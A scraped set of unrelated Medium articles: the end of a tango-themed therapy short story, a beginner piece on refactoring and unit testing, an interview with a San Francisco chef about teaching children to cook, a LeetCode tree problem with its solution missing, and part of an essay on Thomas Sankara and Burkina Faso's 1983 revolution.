“It’s not the Holy Grail.”
“What is?”
“That which we name.”
He nodded agreement, quaffed, and quipped, “So Yvette is a TAD off, too.”
Dr. O chuckled, drained her goblet and said, “Hardy har. A three-legged dog walks into a bar and says, ‘I’m lookin’ for the man who shot my Paw’.” She stood to leave.
“One bad joke deserves another,” said Dr. N. “Clap twice if you need me.”
When the session started, Yvette asked Dr. O, “Who was that man in the waiting area?”
“You know the oath of client-privacy,” said Dr. O.
“Never mind, I’ll see him at a milonga and find out.”
Dr. O hoped, really hoped, she would.
Yvette launched into her spiel. All the good men not paying her one ounce of attention. Or worse, teasing her, dangling carrots, then dropping the ball or carrot, keeping her at an arm’s length, sending mixed messages. Keeping her awake at night, waiting, not knowing, not knowing. The unbearable uncertainty. And then this one and that one who knew they didn’t have a chance with her, start texting her. The utter gall. Yvette didn’t require Dr. O to say a word, just to listen. As she went on in this vein, Dr. O recalled one visit when Yvette had looked real, had forgot to wear her mask. Her fabulous marble-green eyes shone true as she told of Herman, the one guy she could have, should have, would have stayed with. “Ah, but he’s back in Mahwah.”
Her Man in Mah Way, Dr. O remembered it, like a short story title. Yvette was such an open-and-shut case. If only she knew it herself.
“Oh, Dr. O, I’m so miserable. All I want is a modest life, to be happy, to be free from all this anxiety and not knowing. One good man. That’s all. Is that asking for too much? Really?” Yvette began to cry. Dr. O handed her the ever-ready box of tissues. Yvette sobbed for a full five minutes. Dr. O recalled how arrogant and self-absorbed Yvette had appeared at her intake almost a year ago. Dr. N vetted Yvette, as he always did the initial intake. He sat with them cross-legged facing each other. He took the pulse of the patient as they danced both to DiSarli and Biaggi, the respective Kings of Romance and Rhythm. He peered into their eyes and studied their souls, made notes. He had become so good at reading souls, gazing there where no words dared be said or heard. He felt their hearts beat against his heart. He did this to men and women. For one full minute, he and the new patient stared into each other’s eyes. He must have learned this somewhere, back in the Sixties maybe, that the eyes show the strength of the soul. Dr. N’s diagnosis was that Yvette had a major gash in her soul. But nothing that a proper, genuine Tango Moment could not fix. Dr. O was piecing this advice together with Bennie’s problem when Yvette finally stopped crying. The entire box of crumpled tissues lay at her feet.
“I have felt for so long, that what I want is within reach, around the bend, on the horizon,” sniffled Yvette. The horizon again. “And then it slips away. Again.”
“Do you sail?” Dr. O triangulated again.
“Heavens, no.”
“I see. Hmmm.”
“Am I asking too much of life?”
“No,” Dr. O answered. “It’s not asking too much.” She wished, though, that Yvette would ask other questions. And she did.
“Dr. O, do you think I should quit the Tango scene? Juggling chainsaws might be less fraught with peril.” Yvette laughed and even with red puffy eyes was so drop-dead gorgeous.
“You have to follow your heart, Yvette.” Stating the obvious occasionally worked.
“I know, I know. Oh, Dr. O, oh. My heart aches. Nobody knows the troubles I’ve seen.”
Glory hallelujah, Dr. O sang to herself. A bandoneon groaned and Yvette stood to leave.
Dr. O clapped twice and Dr. N appeared. “How about a vals (waltz) before Yvette leaves, to calm her. Plenty of CBM, weight changes, those false weight changes called syncopations . . . and a few chassés to chase away the blues. Make it Soñar y nada mas.”
“Quite fitting,” said Dr. N.
As they danced away, Dr. O heard Yvette say, “Oh, Dr. N, you smell wonderful. What is it?”
By and by, Dr. N found Dr. O hanging herself. She was suspended upside down from a bar, in peaceful traction, trying to aerate and nourish the chakras that lay along her spine. Dr. O always did a yoga pose after a few client sessions. She came down when Dr. N called her to consultation. Again, two of the world’s greatest non-thinkers sat down to discuss the pain and agony of their clients. Such Walking Wounded. They scratched their heads, put their hands over their hearts, asked each other, “Have you ever seen two more beautiful people who had it all be so miserable?”
“Fairytales in reverse,” muttered Dr. O. “I’m telling you.”
“Each looking for a soul mate, not knowing they already possess their missing half,” said Dr. N.
Not knowing. Knot knowing, ran through Dr. O’s mind like a mantra.
“Dr. O,” said Dr. N. “I see the wheels turning. What gives?”
“The Wheel of Fortune is always turning . . . What was that last thing you said?”
“About their missing half?”
“Yes,” said Dr. O. She could get to two without passing out.
“Aha, I see,” said Dr. N. “Two missing halves.”
“Do they ever go to the same milonga?”
“More importantly, how do you hand out a prescription for a TM? Can they cultivate and experience a real Tango Moment?” Drs. O & N knew that all their suffering would come into perspective once they achieved this. The Tango Moment was simply code, symbols like all words, in this case for the God Experience. Dr. O preferred the Latinate Tangotum momentum, because it was a dynamic state.
From the moment they met, Drs. Ocaramia and Nureyev had not thought of each other in earthly terms. They had gone through the metaphysical sieve, like many Tango dancers. Drs. O & N were skilled in the dialogue of body language. Communicating only with alpha waves of their brains, the EKGs of their heartbeat, and the light available to their retinas, Drs. O & N went on to share the wisdom, ideas, concepts running through their hearts and minds. In a fairytale ending, they agreed Bennie and Yvette would meet and complete each other, supply that missing half, and bring eternal bliss, a model for others. But this was real life. Something bigger and better was actually available to both of them. Some tapping in to that absolute. Their private hells could become heavens as easily as it took to take a side step in Tango and exit clock time. Presently, the two not-thinkers switched back to spoken language:
Dr. N: So, yes, for all the Tango they dance, both are lacking the God experience.
Dr. O: Possibly due to their being treated like gods and goddesses all their lives.
Dr. N: Hmmm, I see. Possibly. And yet, like the rest of us mortals they have the wound, the gash in the soul. I looked in and saw it, clear as your bandoneon bell.
Dr. O: Indeed, they both have the crack that lets the light in. Perhaps they need to bleed into each other’s wounds?
Dr. N: It seems so obvious. A homeopathic approach is in order. They are so, so . . . symmetrical.
Dr. O: Indeed, Dr. N, mirror images. If only . . . we could . . .
Dr. N: Hmmm, yes, absolutely. Are you not-thinking what I’m not-thinking?
Drs O & N: GIVE EACH OTHER A GENUINE TANGO MOMENT.
Dr O (rubbing her chin where a beard would be were she a man): Uh-huh, um-hmmm.
Dr. N: (Rubbing his seven-hour stubble, leaning forward on his knees): Uh, huh. . .
She triangulated again. Bennie and Yvette each longed for something on the horizon. Inside the Tango Moment there is no horizon, you are IT. TM is characterized by a suspension of longing; the longing is not squashed or killed — that would be violence. But it’s balanced inside a boundless feeling of equanimity. Longing, after all, is our human default mode of being, as long as we are of the flesh. We experience our first, or primal, longing for mother and then it keeps morphing and transferring into and onto other things, in most of us in socially acceptable ways. Our monetary system is built and sustained solely on longing. When longing is vigorously and mindfully concentrated, focused, and channeled into a pointed understanding of life and existence, it is called “way seeking.” Suffering then becomes a subset . . . Dr. O found her head aching, too much thinking. She turned to Dr. N, who seemed on the verge of too much thought, also.
“Why do you believe people can go their whole lives dancing, or doing anything they love or what they believe they are meant to do here on earth and never ever experience the TM or its reasonable facsimile?” she asked.
“Fear. Fear of intimacy kills the possibility for Tango Moments. Fear of not looking good. Fear of losing control kills the moment. The best experience of life occurs the moment we relinquish control.” And fear of being wrong, being found out. Fear that our partner is right — all anti-Tango mind states. Fear and Tango can never cohabitate, especially during a TM.
“ ‘No tears, no fears, no ruined years, no clocks.’ I’ve always adored that line from the time I was sixteen. I wanted to be a Twentieth Century Fox.”
“You are,” complimented Dr. N.
Dr. O wasn’t sure that was a good thing. He continued, “Ah, the Tango Moment is love living momentarily in its purest state without words, without even relationship.”
“If TM = Now, why can’t B + Y access theirs? Maybe through meditation?” she asked.
“Even meditation kills the TM because the life of the Tango Moment is exterminated by pure high-grade consciousness. The TM lives in the middle ground between bliss consciousness and its exact opposite, blatant unconsciousness.”
“Dr. N! My sentiments precisely. An optimal arousal is called for, you mean to say.”
“Too excited and it’s lost; depressed, anxious, and it’s gone. The middle ground is where life and love dance, where the music is played — the stimulus for the Tango Moment.”
“Ah, zee music?” Dr. O liked to channel Dr. Ruth sometimes — she had sent clients to Dr. Ruth. “How could this be? An outside stimulus? Hmmm.”
“An inside stimulus. The music is in us. In a state of either meditation/consciousness or unconsciousness, I can’t hear the bandoneon, therefore no Tango Moment. Also, even in the middle ground thinking kills the moment — even recalling a Tango pattern.”
“Dr. N, No need to state the obvious. I think Yvette and Bennie are custom-made for sharing a TM.”
“Bennie must have no fear of being untrue to his primary love relationship . . . what’s her name? Groin?”
“Please, Dr. N, Not One, Not Two, Not Three. Stop counting. How many times I hafta tell ya.” She slipped into her New Jersey accent. “No primary, no secondary . . .” Dr. O passed out cold. As usual, Dr. N, thought she was bored or having a narcoleptic fit. Thus, Dr. O did not hear his last question: “What is the state of mind that is the primordial pool from which the nascent Tango Moment emerges? Is it a contemplative state?”
When Dr. O came to, Dr. N was looking into her eyes. She picked up a conversation they had a year ago. “We are always in a state more or less of longing, which adds to our suffering. We start planning and missing the present momentum. The Don Juans and Dona Juanas suffer thus, fatally driven to search, wonder, wander, search again. The viral longers. These are the real sufferers among us.”
“Dr. O, you don’t think you should reserve the word suffering for those in India, China, Burma, Africa . . . It seems wasted to me on a Dandi like Bennie, with his butter-soft leather shoes, Brioni suits, Canali shirts . . . errrr. . . ” he trailed off and looked down at his own attire. The fact was, Dr. N preferred modest dress, jeans and T-shirt or sports shirt, but Dr. O thought he should dress up for their clients.
Dr. O nodded understandingly. “Dr N, I am not without compassion for those all over the globe suffering torture and deprivation. But I must say, heartless as it sounds, it is within our reach right now to end that physical and mental torture. Those with too little can be fed tomorrow. The tyrants can be stopped. As blessed as are the meek, so are as cursed the mighty, the ninth Beatitude. Do you know who the Dalai Lama feels most sorrow for in this world? The Americans. Yes, we who suffer from epidemic low self-esteem. That is a disease. An ill-at-ease that no one but the sufferer can end. And all those other ills, shortages, torture, brutality, can be traced to low self-esteem in someone. Low self-esteem has the potential to gives rise to dictators, satanic leaders, to all kinds of tyranny, and to viral longing.”
“‘Others made me a slave. But I may squeeze the slave out of myself, drop by drop,’ wrote Chekov.”
“Exactly. Now please, before I get on a soapbox or something, put me at-ease. Let’s Tango. Make it DiSarli’s Nido Gaucho, that song about longing for a paradise lost.”
A week later, when Dr. O heard the bandoneon ring, she knew it was Bennie. She thought she detected some new notes of elation in the groan even before she opened the door and saw Bennie’s face.
“Dr. Ocaramia!” He strode past her to his seat. “You have never looked more beautiful before.”
She had just woken up from a deep sleep, having heard someone on NPR estimate how many stars are in the universe. “Gee, thanks, Ben.”
“Hey, I’m double parked, but no problem. I won’t be staying long.”
She knew why but still wanted to hear it from his mortal mouth. “What gives?”
“Everything gives, Dr. O. Everything. I was going through my routine at the Verdi Club on Thursday night, ticking off the women I wanted . . . well, you know my game better than I, when I spot a new dancer. She makes Liz, Taylor, Audrey Hepburn, and Ava Gardner look like home girls.”
“Oh, and what about Sophia Loren?”
“Her, too. Her name is Yvette.”
“Yvette, Yvette . . . ah, yes, Yvette.”
“I don’t know how to explain it. On the one hand it was nothing out of the ordinary. I invited her to dance and it was going well. I led a few ochos, molinetes to the left to the right . . . . And then it was, I can’t find another word, DIVINE. I felt the room, the music, the others around us, all there, but at the same time gone . . . like you always say our feet are planted in the earth but our upper body is in heaven . . . .we were all part of a master plan, and everything was perfect. I felt at once that the story of my life was etched on the heart of another. And at the same time, there were millions of stories passing by, all wonderful, marvelous. Dr. O, I’m at a loss for words. It was like . . . like . . . .”
Dr. O yawned and listened.
Bennie’s eyes were like polished-stars-of-sapphire illuminating the room. “It was like Infinity.”
Dr. O smiled. She adored and worshipped Infinity, a quantity that was really a quality, a figure eight on its side. An ocho.
Dr. O knew the rest of his story but she asked anyway. “And Groynehilda?”
“My beloved she is and will be. The message for me is that life makes sense as it is. I understand the essence of Tango. I cannot stop my RRE, but I can let it be. Groynehilda and I are getting married next week. I understand everything about myself and who I am is who I am. Oh, Dr. O, I owe you so much.”
“No, you didn’t need me.” She yawned again. “Pay it forward. You better move your car.”
Bennie hugged her tightly and left. She was proud of Bennie for cutting to the chase. So often the mistake we make in the West is thinking the catalyst — the material world, be it person, money, house, car — is the happiness. Bennie had not ever considered that Yvette was IT. She was only his gateway.
Dr. O waited in lotus pose. Less than an hour passed. The bandoneon groaned with elation. Drs. N and O opened the door to greet Yvette. “Drs. O and N, my joy knows no words or bounds. Hey, I’m double parked but this will be fast.”
As they stood on the dance floor at the entrance, Yvette sashayed with her imaginary partner and then stood still and said. “I think you know. I have experienced God.”
“All will be well,” said Dr. O.
“That man, Bennie . . .” Yvette looked deeply into Dr. N’s eyes, then into Dr. O’s eyes. They all three had a silent conversation and understood what had occurred. Yvette, too, understood, like Bennie that the plug is not the electricity. The streambed is not the river. Bennie was merely her gate. Her man in Mahway awaited.
“I talked to Herman last night. We’re going to meet up soon.”
“Oh, ah, sounds serious,” Drs. O and N cooed in tandem.
“Oh, you two, don’t act so surprised,” said Yvette. “Before I settle down with Herman, I plan to go on a pilgrimage alone. I’m leaving next week for the Andes. There’s a shaman in Cordoba I want to meet and a woman in Buenos Aires, Maria Jose, who reads our moon moods. Naturally, the Mecca of Tango, is a must. Herman will wait for me.”
“You better go move your car,” said Dr. N.
Yvette turned to leave, then looked back. “I know it’s corny but there’s no other way to say it. I have seen the Light.”
When she was gone, Dr. O yawned, then said, “When you were in Death Valley did the wind sift the dunes or the dunes move the wind?”
“Well said, Dr. O, well said. Shall we dance?”
“Yes, do you want to be the dune or the wind, today?”
“Mmm…I see the mirage of a Tango Moment.”
“OASIS.” | https://medium.com/nomudnolotus-writer/the-optimal-arousal-of-bennie-and-yvette-a-love-story-f15c72c6289e | ['Camille Cusumano'] | 2020-03-20 21:00:08.255000+00:00 | ['Tango', 'Short Story', 'Fiction', 'Psychotherapy', 'Writing'] |
How Should We Prepare to Refactor Our Code? | Photo by Mimi Thian on Unsplash
Programs are always changing as new requirements come in. Unless we replace it with something completely new, the code is always going to be worked on.
In this article, we’ll look at how to we prepare to refactor our code so that we can rework our code to make maintenance easier.
When Should We Refactor?
Refactoring is something that we may have to do when we have to change code so that we can meet new requirements.
If things can’t be merged together or anything that looks wrong, then we’ve to change them to make them right.
Duplication is something that we should eliminate in our code. Is anything violates the DRY principle, then clean those up.
Nonorthogonal code should also be changed so that they’re orthogonal. Having code that doesn’t break other parts when changing them is critical.
Any outdated code should also be updated. If there’s dead code, then remove them. Code that meets outdated requirements also has to be updated to meet new requirements.
If the performance requirements aren’t met anymore, then we have to move the functionality from one area of a system to another to improve performance.
Real-World Complications
We may not have time to refactor now. But if we don’t do it now, then we’re just compounding the problems with our code and we’ll run into problems later.
We got to explain this to stakeholders so that we’re given the time to refactor our code.
If we wait longer, the problems that arise from not refactoring will get worse.
Refactor Early, Refactor Often
Therefore, we should refactor whenever we need to do it.
Refactoring is all about redesign our existing code. Anything that the team designed can be redesigned in light of new facts, deeper understandings, changing requirements, and anything else that arises.
It’s something that needs to be undertaken slowly, deliberately and carefully.
We shouldn’t try to refactor and add functionality at the same time.
Good tests should be in place before refactoring so that we can make sure that our refactoring didn’t break anything.
Some IDEs can do simple refactoring for us automatically like cleaning up unused imports, so we may want to take advantage of that.
Also, we should take small, deliberate steps when we’re refactoring. For instance, we move one field from one class to another.
Then we test and do the next step.
Code That’s Easy to Test
Code that’s easy to test will make our lives a lot easier.
They need to be tested before they’re released to the public.
We can make our code easy to test by writing code that are easy to write unit test for.
A unit test will establish some kind of artificial environment for us to test our code in there.
It checks that our code returns the results that we expect by calling it with a given input.
Then we can assemble all of those unit tests together and run them as a suite.
Photo by Stefan Steinbauer on Unsplash
Testing Against Contract
We’ve to write test cases to make sure that a given unit honors its contract. It tells us whether the code meet the contact and whether the contract is what we think it means.
We want to test modules that deliver the functionality it promises by checking against a wide range of test cases and boundary conditions.
Therefore, to test any function comprehensively, we’ve to test them against a few cases.
We can pass in some invalid arguments and ensure that it’s rejected.
Also, we’ve to pass in some boundary value and ensure that the result is correct.
Then we pass in some valid arguments and ensures that the result is still correct.
However, most modules depend on other modules. This means that we have to do more work to write our tests.
Our tests would test the submodules that the current module depends on first, and then test the behavior of the module that we’re trying to test.
With comprehensive test coverage, we avoid lots of issues that we’ll miss if we don’t have enough tests.
Conclusion
We should write testable code so that we can run tests to make sure that we didn’t break anything when we’re refactoring.
Refactoring is important since requirements change so that we’ve to change our code to make sure that everything still works after we changed them. | https://medium.com/dev-genius/how-should-we-refactor-our-code-afca80b28714 | ['John Au-Yeung'] | 2020-06-19 15:49:20.902000+00:00 | ['Technology', 'Software Development', 'Productivity', 'Programming', 'Web Development'] |
Feeding Ourselves: Eliza Martin | GP Interview #24 | Eliza and Brian romance some asparagus out at Hot Springs Ranch in Nevada
Our friend Eliza Martin is a chef, educator and speaker on topics related to personal empowerment through confidence in the kitchen. She imagines a society where nearly anyone can work with any simple ingredients to provide themselves and loved ones with healthy and delicious meals.
After working her way up the restaurant chain from line cook to Executive Chef in NYC, Chicago, and San Francisco, and serving on the Rachael Ray Show and at Saveur Magazine, Eliza became a “Chopped” Champion and won a James Beard competition.
Trained in a wide range of cuisines, from Italian, to Indian to Creole, Eliza has a gift for improvisation and engaging the beginner, from 4 to 80+ years old. Today she serves as an instructor at Culinary Artistas in San Francisco’s Ghirardelli Square neighborhood.
Culinary Artistas Kitchen near Ghirardelli Square
GP: So you care a lot about kids, food and their ability to prepare food for themselves. How does this empower kids? What is it like teaching kids in the midst of a pandemic?
EM: Children are incredibly resilient and ease into change incredibly well, often better than adults. But they are also fragile and at times need extra care. Kids are grateful for, but a little nervous about, reentry into tiny amounts of social interactions.
In many ways, children mirror or reproduce their families’ struggles right now. If there was tension at home, in would manifest in each child’s mood, behavior, distraction. Cooking, I hope (and believe) was their outlet, a way to bring focus and creative confidence.
GP: How have things shifted in your teaching? You used to have 30 kids at a time, age 4 to 10, kind of a happy anarchy. Now you have essentially quarantined pods of 12 kids at a time. What is this like for them? What are they teaching you?
EM: The kiddos I’m hanging out with sometimes have emotional breakdowns halfway through our three weeks together. They were releasing pent up angst! Using their hands, getting VISCERAL learning, getting a little bit of a “taste” of normalcy, and a huge new sense of empowerment by FEEDING themselves.
GP: There are kinesthetic theories of learning, that when we involve our hands and move our bodies, we retain and internalize new knowledge better. What has been your experience here? What is your goal for enriching these kids lives?
EM: Marrying action to a process really helps kids to understand the WHY. They aren’t just watching food get crafted. They physically measure, mix, chop and stir their way to dish completion. Through this process, they understand why the food they crafted looks and tastes the way it does.
There is a huge sense of pride that results from crafting a dish “all by yourself,” and an enormous amount of more adventurous tasting that results. This applies to adults as well.
Alice Waters, image courtesy of Wikipedia
GP: Tell us a little bit about your relationship with farmers and food producers. Who are some of the local people you admire most and what do you admire about them?
EM: Alice. Freaking. Waters. She is a gem. Teach a man to fish.
GP: What have you seen in terms of food security for people in the midst of this economic crisis? How can the community of chefs help to support food security for people who may be in danger of going hungry?
EM: To be frank, I think at the moment chefs are in danger of being directly affected by the economic crisis. If we had an organizing force (OH HI RAMAN), we may be able to make some real difference in the form of a soup kitchen. We might even be capable of calling on the corporate bay clans to be a part of a BOGO (Buy One Give One): buy a ticket to an event, give a meal to a family…..just brainstorming here….
GP: How do you think the food and hospitality industries will change as a result of all of these crises? What kind of world will chefs and kitchen staff be walking into on the tail end of this pandemic? Are there any silver linings in how eating together will change?
EM: I feel desperately worried for my line cook friends. They have a very specific, tremendously useful skillset that is essential to restaurant service. But so many of those doors have closed.
I will say for the average person stuck at home, food has become a roller coaster. At first everyone wanted to be pro sour-dough makers. Then cooking started to become a burden, a bit redundant. Kitchen fatigue is a thing.
My hope is that folks challenge themselves to try a few new things during those ruts.
I also hope that because people are at home more than ever, meal time might become more of a sacred practice; truly the one thing we can control in these desperate times is what we eat. If we can turn it into a meditation…or at least a conscious one framed by gratitude, that might allow our brains a bit of quiet and some interaction with loved ones.
GP: In a world where so much feels out of our control, is food an area of potential autonomy, the one variable where we have power? Tell us a little about The Yoga of Eating and your hopes for the sacredness of mealtimes.
EM: Feeding ourselves and each other is an act of love. When we can create meal time with that in mind, it’s powerful. We nourish our bodies every time we eat. Truly maternal care.
GP: How are you and Brian holding up? Who gives you feelings of solidarity and who brings you hope? Is all of this social isolation ironically an opportunity to build community and a feeling that we have one another’s backs?
EM: My partner, Brian is a rock. He’s steadfast, stable, and we are fortunate enough to both have successful jobs.
Brian has been an example of care for me. Small tasks like doing the laundry and cleaning dishes go a real long way these days. Connection is so important right now. It’s amazing how much gratitude we can feel for such little moments these days.
Vanessa Silva, founder of Culinary Artistas
GP: Tell us a little about Vanessa Silva and your work at Culinary Artistas? How are you also supporting college students these days?
EM: I’ve been partnering with colleges to run Instagram takeovers and special classes for college students. It’s my mission to get young adults cooking for themselves, alone or for friends. I’m starting to work on virtual keynotes at colleges, and homecoming events with family cook-alongs! :) | https://medium.com/good-people-dinners/feeding-ourselves-eliza-martin-gp-interview-24-5219f2ebce9b | ['Raman Frey'] | 2020-09-23 16:46:08.841000+00:00 | ['Teaching', 'Learning', 'Chefs', 'Food', 'Interview'] |
623. Add One Row to Tree | LeetCode level medium question involving BFS and binary trees
Given the root of a binary tree, then value v and depth d , you need to add a row of nodes with value v at the given depth d . The root node is at depth 1.
The adding rule is: given a positive integer depth d , for each NOT null tree nodes N in depth d-1 , create two tree nodes with value v as N's left subtree root and right subtree root. And N's original left subtree should be the left subtree of the new left subtree root, its original right subtree should be the right subtree of the new right subtree root. If depth d is 1 that means there is no depth d-1 at all, then create a tree node with value v as the new root of the whole original tree, and the original tree is the new root's left subtree.
Example 1:
Input:
A binary tree as following:
4
/ \
2 6
/ \ /
3 1 5 v = 1 d = 2 Output:
4
/ \
1 1
/ \
2 6
/ \ /
3 1 5
Example 2:
Input:
A binary tree as following:
4
/
2
/ \
3 1 v = 1 d = 3 Output:
4
/
2
/ \
1 1
/ \
3 1
Note:
The given d is in range [1, maximum depth of the given tree + 1]. The given binary tree has at least one tree node.
Result:
Success Details Runtime: 0 ms, faster than 100.00% of Java online submissions for Add One Row to Tree. Memory Usage: 38.6 MB, less than 87.71% of Java online submissions for Add One Row to Tree.
Solution: | https://medium.com/@jesus-patinoflores/623-add-one-row-to-tree-727f39e89fa1 | ['Jesus Pf'] | 2020-12-10 18:15:44.011000+00:00 | ['Leetcode', 'Software', 'Interview', 'Bfs', 'Facebook Interview'] |
Thomas Sankara — Pan-Africanist and Marxist Revolutionary | “While revolutionaries as individuals can be murdered, you cannot kill ideas.” — Thomas Sankara
“Debt is a cleverly managed reconquest of Africa. It is a reconquest that turns each one of us into a financial slave.” — Thomas Sankara
Thomas Sankara and the Revolutionary Birth of Burkina Faso
by Mamadou Diallo (https://www.viewpointmag.com/2018/02/01/thomas-sankara-revolutionary-birth-burkina-faso/)
In 1983, 23 years after its independence and the succession of several neo-colonial regimes, the Upper Volta was one of the most materially destitute countries in the world. 98 percent of its population was illiterate and its GDP per capita was just over 100 dollars of the time. Out of the seven million inhabitants of the country, six million belonged to the peasantry. This peasantry had to subsist on difficult soils, faced rampant desertification, and the degradation of the terms of the cotton trade, the young nation’s main source of currency. Since its constitution as a colony within French West Africa in 1919, the Upper Volta was a disenfranchised territory, considered by the colonial apparatus to be a reserve of forced labor and agricultural workers for the great coffee and cocoa plantations of neighboring Côte d’Ivoire. Health and education equipment, even for the very low standards of the region, remained particularly scarce and inadequate to satisfy the needs of a growing population.
Sankara, the Shaping of a Political Subject
Thomas Isidore Noël Sankara, the son of a soldier of the colonial army turned civil servant, grew up, in the course of his father’s assignments in the countryside, in contact with the people but shielded from its misery. There was, though, a moment in his childhood that shows the young Sankara’s inclination to rebellion and sensitivity to social justice. But mostly, he was a conscientious boy who, according to his biographers, demonstrated a precocious seriousness in his studies. In 1966, the year that saw Maurice Yaméogo, Upper Volta’s first president, ousted by a coup and replaced by a military régime, the young Thomas was admitted to the military academy of Kadiogo in the suburbs of the capital Ouagadougou. It is there that he met Adama Abdoulaye Touré, the establishment’s director of studies and member of the Parti Africain de l’Indépendance who gathered some of his students for informal political discussions, after school hours. It was probably there that the young Thomas Sankara started his ideological training and first heard of imperialism.
After graduating from high school in 1969, Sankara was one of the three students of the academy to be offered a scholarship and the possibility to continue his studies in Madagascar. He would go on to stay four years on the island where he would be deeply affected by the 1972 Malagasy Revolution, considered by some to be its “second independence.” In Madagascar, Sankara paid special attention to the role of the army in the socio-economic development of the country. When he returned to Upper Volta with the rank of officer, he was given the command of a training camp and became known for both his rigor and unorthodox ideas, one of which being his belief in the importance of civic and intellectual training of the recruits.
When Revolution Is the Reasonable Course of Action
Thomas Sankara’s Revolution is often dismissed with the argument that it was the result of a military coup rather than the outcome of a popular movement. The argument suggests that because it was born out of the will of just a few radical putschists, it had no real substance and roots in Voltaïque society and history. Such a presentation of the Revolution, which only focuses on the military manoeuvres of August 4, 1983, is superficial and fails to take into account two essential conditions: (1) the international and national context from which the Revolution arose; and (2) the legitimacy that Thomas Sankara acquired in the years before the Revolution.
(1) Thomas Sankara and his allies did not take state power in a context of institutional stability, but rather in a climate of chronic instability and endless succession of regimes themselves established by putsches. Each of these ephemeral regimes — which was born out of the unpopularity of its predecessor — proved incapable of solving its social crisis, removing Upper Volta from the orbit of France, and freeing its economy from dependence on aid and fluctuations in world cotton prices. The international context of the early 1980s imposed on oil-importing countries in Africa such as Upper Volta several external shocks: rising oil prices; rising interest rates of the American Federal Reserve Bank, on which debt was indexed; continuously deteriorating terms of trade; and, the slowing of international trade due to the global recession. The Sankarist Revolution was in that context the peak of a series of revolts, the breakdown of an inept cycle, and the beginning of a historical sequence that would see Upper Volta become Burkina Faso and, to deal with its critical situation, “dare to invent the future.” 5
(2) To present the Sankarist Revolution as just another coup, one of the many that took place in postcolonial Africa and often with backing from imperialist states, is also to ignore the thread of events that constituted Thomas Sankara’s life as an officer in the Upper Volta army prior to the night of August 4, 1983 and conferred on him both popularity and political legitimacy. Three years before the Revolution, on November 25, 1980, a group of senior army officers led by Colonel Saye Zerbo instigated a coup and seized power on the pretext of an “erosion of state authority.” Although not part of the plot, Thomas Sankara who was well known by the public because of his progressive ideas and a feat of arms during the border conflict of 1974 with Mali, was offered a position in the new government. He politely declined at first, but because of the president’s insistence, he was compelled to accept with the condition that he would stay in office for no more than two months.
He was appointed to his first political charge in September of 1981 as Minister of Information and it took time for the inhabitants of Ouagadougou to get used to seeing a member of government going to work on his bicycle. The information Ministry, which until then was rather that of propaganda, changed radically in its relations with the media when Sankara took its lead. He encouraged journalists who were not accustomed to freedom, to write pieces on corruption cases. Articles were soon published that documented cases of embezzlement in a public bank and which suggested the complicity of civil servants from the Ministry of Trade. The police summoned the director of the National News Agency and accused him of feeding that information to the press. Sankara, as Minister of information, defended the press, reaffirmed its mission and freedom to inform the public, protesting to the Minister of the Interior.
As government popularity was falling apart, the trade union movements were being repressed, and their leaders imprisoned, Thomas Sankara resigned resoundingly: he sent an open letter to President Zerbo denouncing the régime, which he decried as bourgeois and serving the interests of the minority. He was immediately stripped of his rank of captain and deported to a remote military camp. Another coup occurred on November 7, 1982, without the participation of Sankara and his left-wing comrades of the army who believed that a movement led only by the army would not allow for the deep political changes to which they aspired.
Acknowledging his popularity, an extraordinary assembly of the CSP (Council for the Salvation of the People) presided by Captain Jean Baptiste Ouedraogo, appointed Captain Sankara Prime Minister of Upper Volta on January 10, 1983. From then on, when Sankara began diplomatic functions with an official visit to Tripoli and an attendance of the Non-Aligned Summit in New Delhi where he met with Fidel Castro, neighboring Côte d’Ivoire with backing from France, started to worry about the political evolution of Upper Volta. Between March and May 1983, Sankara gave resounding speeches to mass rallies with messages and tones that made no mystery of his political leanings.
Two days after Sankara’s speech in Bobo-Dioulasso on May 14, 1983, Guy Penne, Mitterand’s adviser for Africa, arrived in Upper Volta for an official visit. Early in the morning that followed on May 17, armored vehicles encircled the residence of Thomas Sankara, effectively placing him under house arrest. In the days that followed, great demonstrations flared up in Ouagadougou, where the slogan “Free Sankara!” rang out. Popular demonstrations, as well as a faction of the army loyal to Sankara, compelled the authorities to release him. For two months, the political situation remained unresolved, each of the camps paranoid and consolidating its positions. Sankara and the left wing of the army strengthened their ties with civilian populations and trade union organizations, and set up a political platform.
Captain Blaise Compaoré, a friend and long-time comrade of Thomas Sankara, then took the rumor of an attempt to assassinate the latter as a pretext to move with troops on Ouagadougou in the afternoon of August 4, 1983. Civilian groups supported the operation by cutting electricity in the capital. By 9:30 p.m., Compaoré’s troops controlled the capital. At 10:00 p.m. Thomas Sankara announced via radio the fall of the government of Ouedraogo and the beginning of a revolutionary process, the formation of the National Council of the Revolution, and called for the creation of revolutionary committees in all the localities of the country. He announced that night on the radio that the purpose of the government would henceforth be to help the people achieve their “deep aspiration for freedom, true independence, economic and social progress. Upper Volta, the colonial invention, then made way to Burkina Faso, the land of the Upright Man.
Whose Revolution?
“No altar, no belief, no holy book, neither the Qur’an nor the Bible nor the others, have ever been able to reconcile the rich and and the poor, the exploiter and the exploited. And if Jesus himself had to take the whip to chase them from his temple, it is indeed because that is the only language they hear.” — Thomas Sankara
Marxism has occupied a prominent place in the theoretical arsenal of intellectuals and political figures who have led struggles for African independence. Few, however, are those among the intellectuals and African heads of states who have not felt the need to expunge from Marxism a dimension that is essential to it: class struggle. Two factors at least seem to explain this rejection of class struggle as the engine of history.
One is the class position of the leaders of decolonization, recruited from either the chieftaincy — which was either established or fundamentally transformed during colonialism by the powerful technology of indirect rule — or, and more often, among the petty-bourgeois intellectuals. Although these two groups are significantly different when it comes to culture, they are natural and complementary allies in the field of class politics as they both are products of and essential cogs in the machine of imperialist domination over their society’s productive forces. While petty-bourgeois intellectuals use their acquired skillsets to manage the postcolonial state and negotiate the terms of its extraversion, customary chiefs and religious authorities organize the participation of the masses. Decolonization, for these two groups, does not mean a rupture with the colonialist state and its capitalists, but greater and more profitable negotiation potential.
